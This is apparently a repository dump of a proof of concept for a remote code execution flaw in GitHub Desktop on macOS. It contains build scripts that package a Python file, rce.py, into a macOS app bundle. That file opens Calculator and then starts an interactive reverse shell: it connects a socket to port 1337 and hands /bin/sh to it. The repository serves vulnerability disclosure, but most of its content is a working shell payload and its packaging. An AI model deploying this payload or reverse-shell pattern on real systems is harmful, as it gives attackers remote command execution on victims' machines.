├── README.md └── osx └── evil-app ├── compile.sh ├── prepare.sh ├── rce.app └── Contents │ ├── Info.plist │ ├── MacOS │ ├── Python │ ├── _codecs_cn.so │ ├── _codecs_hk.so │ ├── _codecs_iso2022.so │ ├── _codecs_jp.so │ ├── _codecs_kr.so │ ├── _codecs_tw.so │ ├── _collections.so │ ├── _functools.so │ ├── _hashlib.so │ ├── _heapq.so │ ├── _io.so │ ├── _locale.so │ ├── _multibytecodec.so │ ├── _random.so │ ├── _socket.so │ ├── _ssl.so │ ├── _struct.so │ ├── array.so │ ├── binascii.so │ ├── bz2.so │ ├── cPickle.so │ ├── cStringIO.so │ ├── datetime.so │ ├── fcntl.so │ ├── itertools.so │ ├── libcrypto.1.0.0.dylib │ ├── libreadline.7.dylib │ ├── libssl.1.0.0.dylib │ ├── math.so │ ├── operator.so │ ├── rce │ ├── readline.so │ ├── resource.so │ ├── select.so │ ├── strop.so │ ├── time.so │ ├── unicodedata.so │ └── zlib.so │ └── Resources │ └── icon-windowed.icns └── rce.py /README.md: -------------------------------------------------------------------------------- 1 | # github-desktop-poc 2 | 3 | PoC for GitHub Desktop RCE (OSX) 4 | -------------------------------------------------------------------------------- /osx/evil-app/compile.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | pyinstaller -w rce.py 3 | mv dist/rce.app/ . 4 | rm -rf build dist rce.spec 5 | -------------------------------------------------------------------------------- /osx/evil-app/prepare.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | pip install pyinstaller 3 | -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | CFBundleIdentifier 5 | rce 6 | CFBundleShortVersionString 7 | 0.0.0 8 | CFBundleExecutable 9 | MacOS/rce 10 | CFBundleName 11 | rce 12 | CFBundleInfoDictionaryVersion 13 | 6.0 14 | CFBundleDisplayName 15 | rce 16 | CFBundleIconFile 17 | icon-windowed.icns 18 | CFBundlePackageType 19 | APPL 20 | LSBackgroundOnly 21 | 0 22 | 23 | -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/Python: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/Python -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_codecs_cn.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_codecs_cn.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_codecs_hk.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_codecs_hk.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_codecs_iso2022.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_codecs_iso2022.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_codecs_jp.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_codecs_jp.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_codecs_kr.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_codecs_kr.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_codecs_tw.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_codecs_tw.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_collections.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_collections.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_functools.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_functools.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_hashlib.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_hashlib.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_heapq.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_heapq.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_io.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_io.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_locale.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_locale.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_multibytecodec.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_multibytecodec.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_random.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_random.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_socket.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_socket.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_ssl.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_ssl.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/_struct.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/_struct.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/array.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/array.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/binascii.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/binascii.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/bz2.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/bz2.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/cPickle.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/cPickle.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/cStringIO.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/cStringIO.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/datetime.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/datetime.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/fcntl.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/fcntl.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/itertools.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/itertools.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/libcrypto.1.0.0.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/libcrypto.1.0.0.dylib -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/libreadline.7.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/libreadline.7.dylib -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/libssl.1.0.0.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/libssl.1.0.0.dylib -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/math.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/math.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/operator.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/operator.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/rce: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/rce -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/readline.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/readline.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/resource.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/resource.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/select.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/select.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/strop.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/strop.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/time.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/time.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/unicodedata.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/unicodedata.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/MacOS/zlib.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/MacOS/zlib.so -------------------------------------------------------------------------------- /osx/evil-app/rce.app/Contents/Resources/icon-windowed.icns: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xacb/github-desktop-poc/38f759c291032c087913c6dfe1ae1ea0d23a9bb3/osx/evil-app/rce.app/Contents/Resources/icon-windowed.icns -------------------------------------------------------------------------------- /osx/evil-app/rce.py: -------------------------------------------------------------------------------- 1 | import socket,subprocess,os; 2 | 3 | os.system("open -a calculator.app") 4 | 5 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 6 | s.connect(("localhost",1337)); 7 | os.dup2(s.fileno(),0); 8 | os.dup2(s.fileno(),1); 9 | os.dup2(s.fileno(),2); 10 | p=subprocess.call(["/bin/sh","-i"]); 11 | 12 | --------------------------------------------------------------------------------